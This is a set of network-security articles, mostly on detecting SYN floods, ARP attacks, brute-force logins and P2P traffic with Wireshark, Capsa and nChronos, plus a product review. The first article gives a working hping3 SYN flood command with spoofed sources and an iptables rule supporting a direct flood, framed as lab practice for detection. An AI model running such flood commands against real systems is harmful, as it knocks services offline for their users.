Event Log Categories

Event log monitoring systems empower organizations to identify and respond to potential security threats, operational issues, and compliance breaches promptly, making them an indispensable tool for maintaining the integrity and reliability of modern digital ecosystems.

All logs contain the following basic information:

Continue reading


How to Perform TCP SYN Flood DoS Attack & Detect it with Wireshark - Kali Linux hping3

wireshark logo
This article will help you understand TCP SYN Flood Attacks, show how to perform a SYN Flood Attack (DoS attack) using Kali Linux & hping3 and correctly identify one using the Wireshark protocol analyser. We’ve included all necessary screenshots and easy to follow instructions that will ensure an enjoyable learning experience for both beginners and advanced IT professionals.

DoS attacks are simple to carry out, can cause serious downtime, and aren’t always obvious. In a SYN flood attack, a malicious party exploits the TCP protocol's 3-way handshake to quickly cause service and network disruptions, ultimately leading to a Denial of Service (DoS) attack. These types of attacks can easily take admins by surprise and can become challenging to identify. Luckily, tools like Wireshark make it an easy process to capture and verify any suspicions of a DoS attack.

Key Topics:

There’s plenty of interesting information to cover so let’s get right into it.

How TCP SYN Flood Attacks Work

When a client attempts to connect to a server using the TCP protocol (e.g. HTTP or HTTPS), it is first required to perform a three-way handshake before any data is exchanged between the two. Since the three-way TCP handshake is always initiated by the client, it sends a SYN packet to the server.

 tcp 3 way handshake

The server then replies, acknowledging the request and at the same time sending its own SYN request – this is the SYN-ACK packet. Finally, the client sends an ACK packet, which confirms that both hosts agree to create a connection. The connection is therefore established and data can be transferred between them.

Read our TCP Overview article for more information on the 3-way handshake

In a SYN flood, the attacker sends a high volume of SYN packets to the server using spoofed IP addresses causing the server to send a reply (SYN-ACK) and leave its ports half-open, awaiting for a reply from a host that doesn’t exist:

Performing a TCP SYN flood attack

In a simpler, direct attack (without IP spoofing), the attacker will simply use firewall rules to discard SYN-ACK packets before they reach him, as shown in the example below. By flooding a target with SYN packets and not responding (ACK), an attacker can easily overwhelm the target’s resources. In this state, the target struggles to handle traffic, which in turn increases CPU usage and memory consumption, ultimately exhausting its resources (CPU and RAM). At this point the server will no longer be able to serve legitimate client requests, resulting in a Denial of Service.
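
For the direct (non-spoofed) variant, the attacker's firewall rule could be as simple as the following hypothetical iptables entry, which silently discards any SYN-ACK replies coming back from the target (192.168.1.159 is the lab address used later in this article):

# iptables -A INPUT -p tcp -s 192.168.1.159 --tcp-flags SYN,ACK SYN,ACK -j DROP

With the replies dropped locally, the attacker's own TCP stack never resets the handshakes (it would otherwise answer the unexpected SYN-ACKs with RST packets), so the victim is left holding the half-open connections.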

How to Perform a TCP SYN Flood Attack with Kali Linux & hping3

However, to test whether you can detect this type of DoS attack, you must be able to perform one. The simplest way is via Kali Linux, and more specifically hping3, a popular TCP penetration testing tool included in Kali Linux.

Alternatively Linux users can install hping3 in their existing Linux distribution using the command:

# sudo apt-get install hping3

In most cases, attackers will use hping or another tool to spoof random IP addresses, so that’s what we’re going to focus on. The line below starts the SYN flood attack and directs it at our target (192.168.1.159):

# hping3 -c 15000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.159

Let’s explain in detail the above command:

We’re sending 15000 packets (-c 15000) at a size of 120 bytes (-d 120) each. We’re specifying that the SYN flag (-S) should be enabled, with a TCP window size of 64 (-w 64). To direct the attack at our victim’s HTTP web server we specify port 80 (-p 80) and use the --flood flag to send packets as fast as possible. As you’d expect, the --rand-source flag generates spoofed IP addresses to disguise the real source and avoid detection, but at the same time it stops the victim’s SYN-ACK reply packets from reaching the attacker.
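
If you would rather confirm that the target and port are reachable before unleashing the full flood, hping3 can send a handful of plain SYN probes first (a hedged example using the same lab target):

# hping3 -S -p 80 -c 5 192.168.1.159

Each reply flagged SA (SYN-ACK) confirms that port 80 is open and responding normally.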

How to Detect a SYN Flood Attack with Wireshark

Now that the attack is in progress, we can attempt to detect it. Wireshark is a little more involved than commercial-grade software; however, it has the advantage of being completely free, open source, and available on many platforms.

In our lab environment, we used a Kali Linux laptop to target a Windows 10 desktop via a network switch. Though the structure is insecure compared to many enterprise networks, an attacker could likely perform similar attacks after some sniffing. Recalling the hping3 command, we also used random IP addresses, as that’s the method attackers with some degree of knowledge will use.

Even so, SYN flood attacks are quite easy to detect once you know what you’re looking for. As you’d expect, a big giveaway is the large number of SYN packets being sent to our Windows 10 PC.

Straight away, though, admins should be able to note the start of the attack by a huge flood of TCP traffic. We can filter for SYN packets without an acknowledgment using the following filter:  tcp.flags.syn == 1 and tcp.flags.ack == 0

tcp syn flood attack detection with wireshark

As you can see, there’s a high volume of SYN packets with very little variance in time. Each SYN packet comes from a different source IP address with a destination port of 80 (HTTP), an identical length of 120 bytes and a window size of 64. When we filter with tcp.flags.syn == 1 and tcp.flags.ack == 1 we can see that the number of SYN/ACKs is comparatively very small. A sure sign of a TCP SYN attack.
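
The same check can be scripted from the command line with tshark, Wireshark's CLI companion, which accepts identical display filters; the capture file name below is hypothetical:

# tshark -r capture.pcap -Y "tcp.flags.syn == 1 and tcp.flags.ack == 0" | wc -l
# tshark -r capture.pcap -Y "tcp.flags.syn == 1 and tcp.flags.ack == 1" | wc -l

A SYN count that is orders of magnitude higher than the SYN-ACK count points to the same conclusion without opening the GUI.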

tcp syn flood attack detection with wireshark

We can also view Wireshark’s graphs for a visual representation of the uptick in traffic. The I/O graph can be found via the Statistics>I/O Graph menu. It shows a massive spike in overall packets from near 0 to up to 2400 packets a second.

tcp syn flood attack wireshark graph

By removing our filter and opening the protocol hierarchy statistics, we can also see that there has been an unusually high volume of TCP packets:

tcp syn flood attack wireshark protocol hierarchy stats

All of these metrics point to a SYN flood attack with little room for interpretation. By use of Wireshark, we can be certain there’s a malicious party and take steps to remedy the situation.

Summary

In this article we showed how to perform a TCP SYN Flood DoS attack with Kali Linux (hping3) and use the Wireshark network protocol analyser filters to detect it. We also explained the theory behind TCP SYN flood attacks and how they can cause Denial-of-Service attacks.


How to Detect SYN Flood Attacks with Capsa Network Protocol Analyzer & Create Automated Notification Alerts

Network Hacker Executing a SYN Flood Attack
This article explains how to detect a SYN Flood Attack using an advanced protocol analyser like Colasoft Capsa. We’ll show you how to identify and inspect abnormal traffic spikes, drill into captured packets and identify evidence of flood attacks. Furthermore, we’ll configure Colasoft Capsa to automatically detect SYN Flood Attacks and send automated alert notifications.

Denial-of-Service (DoS) attacks are one of the most persistent attacks network admins face due to the ease with which they can be carried out. With a couple of commands, an attacker can create a DoS attack capable of disrupting critical network services within an organization.

There are a number of ways to execute a DoS attack, including ARP poisoning, Ping Flood, UDP Flood, Smurf attack and more but we’re going to focus on one of the most common: the SYN flood (half-open attack). In this method, an attacker exploits the TCP handshake process.

In a regular three-way TCP handshake, the user sends a SYN packet to a server, which replies with a SYN-ACK packet. The user replies with a final ACK packet, completing the process and establishing the TCP connection, after which data can be transferred between the two hosts:

tcp 3 way handshake

However, if a server receives a high volume of SYN packets and no replies (ACK) to its SYN-ACK packets, the TCP connections remain half-open, as the server assumes the missing replies are due to natural network congestion:

syn flood attack

By flooding a target with SYN packets and not responding (ACK), an attacker can easily overwhelm the target’s available ports. In this state, the target struggles to handle traffic, which in turn increases CPU usage and memory consumption, ultimately exhausting its resources (CPU and RAM). At this point the server will no longer be able to serve legitimate client requests, ultimately leading to a Denial of Service.

Detecting & Investigating Unusual Network Traffic

Fortunately, there are a number of software that can detect SYN Flood attacks. Wireshark is a strong, free solution, but paid versions of Colasoft Capsa make it far easier and quicker to detect and locate network attacks. Graph-oriented displays and clever features make it simple to diagnose issues.

As such, the first point of call for detecting a DoS attack is the dashboard. The overview of your network will make spikes in traffic quickly noticeable. You should be able to notice an uptick in the global utilization graph, as well as the total traffic by bytes:

tcp syn flood attack packet analyzer dashboard
Click to enlarge

However, spikes in network utilization can happen for many reasons, so it’s worth drilling down into the details. Capsa makes this very easy via its Summary tab, which will show packet size distribution, TCP conversation count, and TCP SYN/SYN-ACK sent.

In this case, there’s an abnormal number of packets in the 128-255 range, but admins should look out for strange distributions under any heading as attackers can specify a packet size to suit their needs. However, a more telling picture emerges when looking at TCP SYN Sent, which is almost 4000 times that of SYN-ACK:

tcp syn flood attack packet analysis
Click to enlarge

Clearly, there’s something wrong here, but it’s important to find the target of the SYN packets and their origin.

There are a couple of ways to do this, but the TCP Conversation tab is the easiest. If we sort by TCP, we can see that the same 198-byte packet is being sent to our victim PC on port 80:

tcp syn flood attack packet analysis
Click to enlarge

After selecting one of these entries and decoding the packets, you may see the results below. There have been repeated SYN packets and the handshake isn’t performed normally in many cases:

tcp syn flood flow analysis
Click to enlarge

The attack becomes most clear when viewing IP Conversation in Capsa’s Matrix view, which reveals thousands of packets sent to our victim PC from random IP addresses. This is due to the use of IP spoofing to conceal their origin. If the attacker isn’t using IP spoofing, Capsa’s Resolve address will be able to resolve the IP address and provide us with its name. If they are, finding the source is likely far more trouble than it’s worth:

tcp syn flood attack matrix
Click to enlarge

At this point, we can be certain that an SYN flood attack is taking place, but catching such attacks quickly really pays. Admins can use Capsa’s Alarm Explorer to get an instant notification when unusual traffic is detected:

tcp syn flood attack alarm creation

A simple counter triggers a sound and email when a certain number of SYN packets per second are detected. We set the counter to 100 to test the functionality and Capsa immediately sent us an alert once we reached the configured threshold:

tcp syn flood attack alarm

Capsa also lets users set up their own pane in the dashboard, where you can display useful graphs like SYN sent vs SYN-ACK, packet distribution, and global utilization. This should make it possible to check for a SYN flood at a glance when experiencing network slowdowns:

tcp syn flood attack packet analysis dashboard

Alternatively, Capsa’s Enterprise Edition lets admins start a security analysis profile, which contains a dedicated DoS attack tab. This will automatically list victims of a SYN flood attack and display useful statistics like TCP SYN received and sent. It also allows for quick access to TCP conversation details, letting admins decode quickly and verify attacks:

tcp syn flood attack tab

Click to enlarge

Together, these techniques should be more than enough to catch SYN floods as they start and prevent lengthy downtime.

Summary

This article explained how SYN Flood Attacks work and showed how to detect SYN Flood attacks using Colasoft Capsa. We saw different ways to identify abnormal traffic spikes within the network, how to drill into packets and find evidence of possible attacks. Finally we showed how Capsa can be configured to automatically detect SYN Flood Attacks and create alert notifications.


Advanced Network Protocol Analyzer Review: Colasoft Capsa Enterprise 11

Firewall.cx has covered Colasoft Capsa several times in the past, but its constant improvements make it well worth revisiting. Since the last review, the version has bumped from 7.6.1 to 11.1.2+, keeping a similar interface but scoring plenty of new features. In fact, its change is significant enough to warrant a full re-evaluation rather than a simple comparison.

For the unfamiliar, Colasoft Capsa Enterprise is a widely respected network protocol analyzer that goes far beyond free packet sniffers like Wireshark. It gives users detailed information about packets, conversations, protocols, and more, while also tying in diagnosis and security tools to assess network health. It was named as a visionary in Gartner’s Magic Quadrant for Network Performance Monitoring and Diagnostics in 2018, which gives an idea of its power. Essentially, it’s a catch-all for professionals who want a deeper understanding of their network.

Installing Capsa Enterprise 11

The installation of Capsa Enterprise is a clear strong point, requiring little to no additional configuration. The installer comes in at 84 MB, a very reasonable size that will be quick to download on most connections. From there, it’s a simple case of pressing Next a few times.

However, Colasoft does give additional options during the process. There’s the standard ability to choose the location of the install, but also choices of a Full, Compact, or Custom install. It lets users remove parts of the network toolset as required to reduce clutter or any other issues. Naturally, Firewall.cx is looking at the full capabilities for the purpose of this review.

capsa enterprise v11 installation options

The entire process takes only a few minutes, with Capsa automatically installing the necessary drivers. Capsa does prompt a restart after completion, though it can be accessed before then to register a serial number. The software offers both an online option for product registration and an offline process that makes use of a license file. It’s a nice touch that should appease the small percentage of users without a connection.

Using Capsa Enterprise 11

After starting Capsa Enterprise for the first time, users are presented with a dashboard that lets them choose a network adapter, select an analysis profile, or load packet files for replay. Selecting an adapter reveals a graph of network usage over time to make it easier to discern the right one. A table above reveals the speed, number of packets sent, utilization, and IP address to make that process even easier.

capsa enterprise v11 protocol analyzer dashboard

 However, it’s after pressing the Start button that things get interesting. As data collection begins, Capsa starts to display it in a digestible way, revealing live graphs with global utilization, total traffic, top IP addresses, and top application protocols.

capsa enterprise v11 dashboard during capture

Users can customize this default screen to display most of the information Capsa collects, from diagnoses to HTTP requests, security alarms, DNS queries, and more. Each can be adjusted to update at an interval from 1 second to 1 hour, with a choice between area, line, pie, and bar charts. The interface isn’t the most modern we’ve seen, but it’s hard to ask for more in terms of functionality.

Like previous versions, Capsa Enterprise 11 also presents several tabs and sub-tabs that provide deeper insights. A summary tab gives a full statistical analysis of network traffic with detailed metadata. A diagnosis tab highlights issues your network is having on various layers, with logs for each fault or performance issue.

In fact, the diagnosis tab deserves extra attention as it can also detect security issues. It’s a particular help with ARP poisoning attacks due to counts of invalid ARP formats, ARP request storms, and ARP scans. After clicking on the alert, admins can see the originating IP and MAC address and investigate.

capsa enterprise v11 diagnosis tab

When clicking on the alert, Capsa also gives possible causes and resolutions, with the ability to set up an alarm in the future via sound or email. An alarm explorer sub-menu also gives an overview of historic triggers for later review. To reduce spam, you can adjust your alarms or filter specific errors out of the diagnosis system.

capsa enterprise v11 analysis profile setting

Naturally, this is a great help, and the ability to define such filters is present in every aspect of the software. You can filter by IP, MAC address, and issue type, or build more complex filters. Admins can remove specific traffic either at capture time or afterward. Under Packet Analysis, for example, you can reject specific protocols like HTTP, Broadcast, ARP, and Multicast.

capsa enterprise v11 packet analysis filters

If you filter data you’ve already captured, it gets even more powerful, letting you craft filters for MAC addresses in specific protocols, or use an advanced flowchart system to include certain time frames. The massive level of control makes it far easier to find what you’re looking for.

After capture is complete, you can also hit the Conversation Filter button, a powerful tool that lets you accept/reject data in the IP, TCP, and UDP Conversations tabs. Again, it takes advantage of a node-based editor plus AND/OR/NOT operators for easy creation. You can even export the filters for use on a different PC.

capsa enterprise v11 adding conversation filter

When you begin a capture with conversation filters active, Capsa will deliver a pop-up notification. This is a small but very nice touch that should prevent users from wondering why only certain protocols or locations are showing.

capsa enterprise v11 packet capture filter us traffic

Once enabled, the filter will begin adjusting the data in the tab of the selected conversation type. Admins can then analyze at will, with the ability to filter by specific websites and look at detailed packet information.

capsa enterprise v11 ip conversation tab

The packet analysis window gives access to further filters, including address, port, protocol, size, pattern, time, and value. You can also hit Ctrl+F to search for specific strings in ASCII, HEX, and UTF, with the ability to choose between three layout options.

capsa enterprise v11 packet capture filter analysis

However, though most of your time will be spent in Capsa’s various details, its toolbar is worth a mention. Again, there’s a tabbed interface, the default being Analysis. Here you’ll see buttons to stop and start capture, view node groups, set alarms for certain diagnoses, set filters, and customize the UI.

capsa enterprise v11 dashboard v2

However, most admins will find themselves glancing at it for its pps, bps, and utilization statistics. These update every second and mean you can get a quick overview no matter what screen you’re on. It combines with a clever grid-based display for the packet buffer, which can be quickly exported for use in other software or for replays.

Another important section is the Tools tab, which gives access to Capsa’s Base64 Codec, Ping, Packet Player, Packet Builder, and MAC Scanner applications. These can also be accessed via the file menu in the top left but having them for quick access is a nice touch.

capsa enterprise v11 tools

Finally, a Views tab gives very useful and quick access to a number of display modes. These enable panels like the alarm view and let you switch between important options like IP/MAC address only or name only modes.

capsa enterprise v11 views tab

In general, Colasoft has done a great job of packing a lot of information into one application while keeping it customizable. However, there are some areas where it really shines, and its Matrix tab is one of those. With a single click, you can get a visual overview of most of the conversations on a network, with Top 100 MAC, MAC Node, IP Conversation, and IP Node views:

capsa enterprise v11 top 100 mac matrix

Firewall.cx has praised this feature before and it remains a strong highlight of the software. Admins are able to move the lines of the diagrams around at will for clarity, click on each address to view the related packets, and quickly make filters via a right click interface.

capsa enterprise v11 matrix

The information above is from a single PC, so you can imagine how useful it gets once more devices are introduced. You can select individual IP addresses in the node explorer on the left-hand side to get a quick overview of their IP and MAC conversations, with the ability to customize the Matrix for a higher maximum node number, traffic types, and value.

capsa enterprise v11 modify matrix

Thanks to its v7.8 update, Capsa also has support for detailed VoIP Analysis. Users can configure RTP via the System>Decoder menu, with support for multiple sources and destination addresses, encoding types, and ports.

capsa enterprise v11 rtp system decoder

Once everything is configured correctly, admins will begin to see the VoIP Call tab populate with useful information. A summary tab shows the MOS_A/V distribution with ratings between Good (4.24-5.00) and Bad (0.00-3.59). A status column shows success, failure, and rejection, and a diagnosis tab keeps count of setup times, bandwidth rejects, and more. While our test environment didn't contain VoIP traffic, we still included the screenshot below to help give readers the full picture.

capsa enterprise v11 voip traffic analysis

In addition, a window below keeps track of packets, bytes, utilization, and average throughput, as well as various statistics. Finally, the Call tab lists numbers and endpoints, alongside their jitter, packet loss, codec, and more. Like most aspects of Capsa, this data can be exported or turned into a custom report from within the software.

Capsa Enterprise 11 creates a number of these reports by default. A global report gives an overview of total traffic with MAC address counts, protocol counts, top MAC/IP addresses, and more. There are also separate auto-generated reports for VoIP, Conversation, Top Traffic, Port, and Packet.

capsa enterprise v11 reporting capabilities

You can customize these with logo and author name, but they’re missing many of the features you’d see in advanced reporting software. There’s no option for a pie chart, for example, though they can be created via the node explorer and saved as an image.

Conclusion

Capsa Enterprise 11 is a testament to Colasoft’s consistent improvements over the years. It has very few compromises, refusing to skimp on features while still maintaining ease of use. Capsa comes in two flavors – the Enterprise version and the Standard version – making it an extremely affordable and robust toolset with the ability to reduce downtime and make troubleshooting an enjoyable process.

Though its visual design and report features look somewhat dated, the layout is incredibly effective. Admins will spend much of their time in the matrix view but can also make use of very specific filters to deliver only the data they want. It got the Firewall.cx seal of approval last time it was reviewed, and we feel comfortable giving it again.


Detect Brute-Force Attacks with nChronos Network Security Forensic Analysis Tool

colasoft-nchronos-brute-force-attack-detection-1

Brute-force attacks are commonly known attack methods by which hackers try to get access to restricted accounts and data using an exhaustive list/database of usernames and passwords. Brute-force attacks can be used, in theory, against almost any encrypted data.

When it comes to user accounts (web based or system based), the first sign of a brute-force attack is a burst of login attempts against an account, which allows us to detect the attack by analyzing packets that contain such events. We’ll show you how Colasoft’s nChronos can be used to identify brute-force attacks and obtain valuable information that can help discover the identity of the attacker, and more.

For an attacker to obtain access to a user account on a website via brute force, he is required to use the site’s login page, causing an alarming number of login attempts from his IP address. nChronos is capable of capturing such events and triggering a transaction alarm, warning system administrators of brute-force attacks and when the triggering condition was met.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

Creating A Transaction Analysis & Alarm In nChronos

First, we need to create a transaction analysis to specify the pattern/behavior we are interested in monitoring:

From the nChronos main page, first select the server/IP address we want to monitor from the Server Explorer section.

Next, from the Link Properties, go to the Application section and then the Analysis Settings as shown below:

colasoft-nchronos-brute-force-attack-detection-2a

Figure 1. Creating a Transaction Analysis in nChronos (click to enlarge)

Now click the New Web Application button (the second green button at the top) to set up a Web Application, enter a Name and HTTP Hostname, then check the box labeled Enable Transaction Analysis and add a transaction with a URL subpath, e.g. “/login.html”.

At this point we’ve created the necessary Transaction Analysis. All that’s required now is to create the Transaction Alarm.

To create the alarm, click Transaction Alarms in the left window, enter the basic information and choose Transaction Statistics as the Type, then set a Triggering Condition as needed, for example, 100 times in 1 minute. This means the alarm will activate as soon as there are 100 or more logins within a minute:

colasoft-nchronos-brute-force-attack-detection-3a

Figure 2. Creating a Transaction Alarm (click to enlarge)

Finally, you can choose Send to email box or Send to SYSLOG to send the alarm notification. Once complete, the transaction alarm for detecting brute-force attacks is set. When the alarm triggering condition is met, an email notification is sent.

Note that this alarm triggering condition does not examine the number of logins per IP address, which means the condition will be met regardless of whether the 100 login attempts per minute come from one or from several individual IP addresses. This can be changed manually in the Transaction Analysis so that it shows the login attempts of each individual IP address.
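The counting logic itself is easy to reproduce outside the appliance. As a rough illustration of the per-IP variant just described – this is not nChronos code, and the pcap filename, the /login.html path and the 100-attempts-per-minute threshold are assumptions carried over from the example above – the following Python/Scapy sketch counts HTTP POSTs to the login page per source IP per minute:

```python
# Count login POSTs per source IP per one-minute bucket from a saved capture.
# Illustration only - the pcap name, URL path and threshold are assumptions.
from collections import defaultdict
from scapy.all import rdpcap, IP, TCP, Raw

THRESHOLD = 100                          # attempts per minute, as in the alarm above
counts = defaultdict(int)                # (source IP, minute bucket) -> attempts

for pkt in rdpcap("capture.pcap"):
    if not (pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt.haslayer(Raw)):
        continue
    payload = bytes(pkt[Raw].load)
    if payload.startswith(b"POST /login.html"):        # one login attempt
        minute = int(pkt.time) // 60                   # one-minute bucket
        counts[(pkt[IP].src, minute)] += 1

for (src, minute), attempts in sorted(counts.items()):
    if attempts >= THRESHOLD:
        print(f"Possible brute force: {src} made {attempts} login attempts in one minute")
```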

Below is a sample output from an alarm triggered:

colasoft-nchronos-brute-force-attack-detection-3a

Figure 3. nChronos Brute-Force alarm triggered – Overall report (click to enlarge)

And below we see the same alarm with a per-IP address analysis:

colasoft-nchronos-brute-force-attack-detection-4a

Figure 4. nChronos Brute-Force alarm triggered – IP breakdown (click to enlarge)

This article showed how nChronos can be used to successfully detect a brute-force attack against any node on a network, or even websites, and at the same time alert system administrators or IT managers of the event.


Introducing Colasoft Unified Performance Management

Introduction to Colasoft Unified Performance Management

Colasoft Unified Performance Management (UPM) is a business-oriented network performance management system which analyzes network performance, quality, fault and security issues on a per-business basis. By providing visual analysis of business performance, Colasoft UPM helps users build proactive, business-oriented network operations, ensures the stable running of business services, and enhances troubleshooting efficiency.

Colasoft UPM contains two parts: Chronos Server as a frontend device and UPM Center as the analysis center.

Frontend devices are deployed at the key nodes of the communication link of business systems, which capture business communication data by switch port-mirroring or network TAP. The frontend collects and analyzes the performance index parameters and application alarm information in real-time, and uploads to the UPM Center via the management interface for overall analysis.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

UPM Center is deployed at the headquarters to collect the business performance indexes and alarm information uploaded by frontend devices, and display the analysis results.

The start page of Colasoft UPM is shown below:

introduction-to-unified-performance-management-1

Figure 1. Unified Performance Management Homepage (click image to enlarge)

This page shows business and alarm statistics over a period of time.

Hovering the mouse over a business sensor (lower left area), we can see there are several options such as “Analyze”, “Query”, “Edit” and “Delete”:

introduction-to-unified-performance-management-2

Figure 2. Adding or analyzing a Business logic sensor to be analyzed (click image to enlarge)

We can click “Analyze” to check the business logic diagram and detailed alarm information.

introduction-to-unified-performance-management-3

Figure 3. Analyzing a business logic and checking for service alarms (click to enlarge)

Click “Query” to check the index parameters to analyze network performance:

introduction-to-unified-performance-management-4

Figure 4. Analyzing performance of a specific application or service (click to enlarge)

We can also click “Intelligent Application” on the homepage to review the relationship of the nodes in the business system:

introduction-to-unified-performance-management-5

Figure 5. The Intelligent Application section reveals the relationship of nodes in the business system

In short, Colasoft UPM helps users easily manage network performance by providing visual analysis based on business, which greatly enhances troubleshooting efficiency and reduces human resource cost.


How to Detect P2P (peer-to-peer) File Sharing, Torrent Traffic & Users with a Network Analyzer

capsa-network-analyzer-detect-p2p-file-sharing-torrent-traffic-1a

Peer-to-Peer file sharing traffic has become a very large problem for many organizations, as users engage in (most times illegal) file sharing that not only consumes valuable bandwidth, but also places the organization in danger: high-risk connections are made from the Internet to the internal network, and malware, pirated or copyrighted material, or pornography is downloaded onto the organization’s systems. In fact, torrent traffic is responsible for over 29% of Internet traffic in North America, an indication of how big the problem is.

To help network professionals in the P2P battle, we’ll show how network analyzers such as Colasoft Capsa can be used to identify users or IP addresses involved in the file sharing process, allowing IT departments to take the necessary actions to block users and similar activities.

While all network analyzers capture and display packets, very few have the ability to display P2P traffic or users creating multiple connections with remote peers - allowing network administrators to quickly and correctly identify P2P activity.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

One of the main characteristics of P2P traffic is that hosts create many connections to and from peers on the Internet, in order to download from multiple sources or upload to multiple destinations.
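The same heuristic is easy to approximate with a short script when a capture file is all you have. The Python/Scapy sketch below is an illustration only – the pcap filename, the 192.168.x.x internal range and the 50-peer threshold are assumptions – and simply counts how many distinct remote peers each internal host talks to:

```python
# Flag internal hosts talking to an unusually large number of remote peers -
# a rough approximation of the "many connections" P2P heuristic.
# The pcap name, internal prefix and threshold are assumptions.
from collections import defaultdict
from scapy.all import rdpcap, IP, TCP, UDP

INTERNAL_PREFIX = "192.168."
PEER_THRESHOLD = 50                      # distinct remote peers before a host is flagged
peers = defaultdict(set)                 # internal IP -> set of remote IPs

for pkt in rdpcap("capture.pcap"):
    if not pkt.haslayer(IP) or not (pkt.haslayer(TCP) or pkt.haslayer(UDP)):
        continue
    src, dst = pkt[IP].src, pkt[IP].dst
    if src.startswith(INTERNAL_PREFIX) and not dst.startswith(INTERNAL_PREFIX):
        peers[src].add(dst)
    elif dst.startswith(INTERNAL_PREFIX) and not src.startswith(INTERNAL_PREFIX):
        peers[dst].add(src)

for host, remotes in sorted(peers.items(), key=lambda kv: -len(kv[1])):
    if len(remotes) >= PEER_THRESHOLD:
        print(f"{host}: {len(remotes)} distinct remote peers - possible P2P activity")
```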

Apart from using the correct tools, network administrators and engineers must also ensure they capture traffic at strategic areas within their network. This means that the network analyzer must be placed at the point where all network traffic, to and from the Internet, passes through it.

The two most common places network traffic is captured are the router/firewall connecting the organization to the Internet, or the main switch to which the router/firewall device connects. To learn how to configure these devices and enable the network analyzer to capture packets, visit the following articles:

Once capturing commences, data will start being displayed in Capsa, and thanks to the Matrix display feature, we can quickly identify hosts that have multiple conversations or connections with peer hosts on the Internet.

By selecting the Matrix tab and hovering the mouse on a host of interest (this also automatically selects the host), Capsa will highlight all conversations with other IP addresses made by the selected host, while at the same time providing additional useful information such as bytes sent and received by the host, the number of peer connections (extremely useful!) and more:

Figure 1. Using the Capsa Matrix feature to highlight conversations of a specific host suspected of P2P traffic

In most cases, an excessive amount of peer connections means that there is a P2P application running, generating all the displayed traffic and connections.

Next, to drill into the host's traffic, simply click on the Protocol tab to automatically show the amount of traffic generated by each protocol. Here we will happily find the BitTorrent & eMule protocols listed:

capsa-network-analyzer-detect-p2p-file-sharing-torrent-traffic-2

Figure 2. Identifying P2P Traffic and associated hosts in Capsa Network Analyzer

The IP Endpoint tab below provides additional useful information such as IP address, bytes of traffic associated with the host, number of packets, total amount of bytes and more.

By double-clicking on the host of interest (under IP EndPoint), Capsa will open a separate window and display all data captured for the subject host, allowing extensive in-depth analysis of packets:

capsa-network-analyzer-detect-p2p-file-sharing-torrent-traffic-3

Figure 3. Diving into a host’s captured packets with the help of Capsa Network Analyzer

Multiple UDP conversations through the same port indicate that there may be a P2P download or upload in progress.

Further inspection of packet information such as the info hash, port, remote peer(s), etc. in ASCII decoding mode will confirm the captured traffic is indeed P2P traffic.

This article demonstrated how the Capsa network analyzer can be used to detect Peer-to-Peer (P2P) traffic in a network environment. We examined the Matrix feature of Capsa, plus its ability to automatically identify P2P/Torrent traffic, making it easier for network administrators to track down P2P clients within their organization.


Improve Network Analysis Efficiency with Colasoft's Capsa New Conversation Colorization Feature

how-to-improve-network-analysis-with capsa-colorization-feature-0

Troubleshooting network problems can be a very difficult and challenging task. While most IT engineers use a network analyzer to help solve network problems, when analyzing hundreds or thousands of packets it can become very hard to locate and further research conversations between hosts. Colasoft’s Capsa v8 now introduces a new feature that allows us to highlight (colorize) relevant conversations in the network based on their MAC address, IP addresses, or TCP/UDP conversations.

This great new feature allows IT engineers to quickly find the related packets of the conversations they want to analyze, using just a few clicks.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

As shown in the screenshot below, users can colorize any Conversation in the MAC Conversation View, IP Conversation View, TCP Conversation View and UDP Conversation View. Packets related to that Conversation will be colorized automatically with the same color.

Take a TCP conversation, for example: choose one conversation, right-click it and choose "Select Conversation Color" in the pop-up menu:

how-to-improve-network-analysis-with capsa-colorization-feature-01

Figure 1. Selecting a Conversation Color in Capsa v8.0

Next, select the color you wish to use to highlight the specific conversation:

how-to-improve-network-analysis-with capsa-colorization-feature-02

Figure 2. Selecting a color

Once the color has been selected, Capsa will automatically find and highlight all related packets of this conversation using the same background color:

how-to-improve-network-analysis-with capsa-colorization-feature-03

Figure 3. Colasoft Capsa automatically identifies and highlights the conversation

Colorizing packets strengthens the link between a conversation and its packets, which greatly improves analysis efficiency.


How To Detect ARP Attacks & ARP Flooding With Colasoft Capsa Network Analyzer

ARP attacks and ARP flooding are common problems small and large networks are faced with. ARP attacks target specific hosts by using their MAC address and responding on their behalf, while at the same time flooding the network with ARP requests. ARP attacks are frequently used for 'man-in-the-middle' attacks, pose serious security threats, can lead to the loss of confidential information, and should therefore be quickly identified and mitigated.

During ARP attacks, users usually experience slow communication on the network and especially when communicating with the host that is being targeted by the attack.

In this article, we will show you how to detect ARP attacks and ARP flooding using a network analyzer such as Colasoft Capsa.

Visit our Network Protocol Analyzer Section for high-quality technical articles covering Wireshark topics, detecting and creating different type of network attacks plus many more great security articles.

Colasoft Capsa has one great advantage – the ability to identify and present suspicious ARP attacks without any additional processing, which makes identifying, mitigating and troubleshooting much easier.

The Diagnosis tab provides real-time information and is extremely handy in identifying potential threats, as shown in the screenshot below:

capsa-network-analyzer-discover-arp-attacks-flooding-1

Figure 1. ARP Scan and ARP Storm detected by Capsa's Diagnosis section.

Under the Diagnosis tab, users can click on the Events area and select any suspicious events. When these events are selected, analysis of them (MAC address information in our case) will be displayed on the right as shown above.

In addition to the above analysis, Capsa also provides a dedicated ARP Attack tab, which is used to verify the offending hosts and type of attack as shown below:

capsa-network-analyzer-discover-arp-attacks-flooding-2

Figure 2. ARP Attack tab verifies the security threat.

We can extend our investigation with the use of the Protocol tab, which allows us to drill into the ARP protocol and see which hosts' MAC addresses are involved in heavy ARP protocol traffic:

capsa-network-analyzer-discover-arp-attacks-flooding-3

Figure 3. Drilling into ARP attacks.

Finally, double-clicking on a MAC address in the ARP Protocol section will show all packets related to the selected MAC address.

When double-clicking on a MAC address, Capsa presents all packets captured, allowing us to drill-down to more useful information contained in the ARP packet.

capsa-network-analyzer-discover-arp-attacks-flooding-4

Figure 4. Drilling-down into the ARP attack packets.

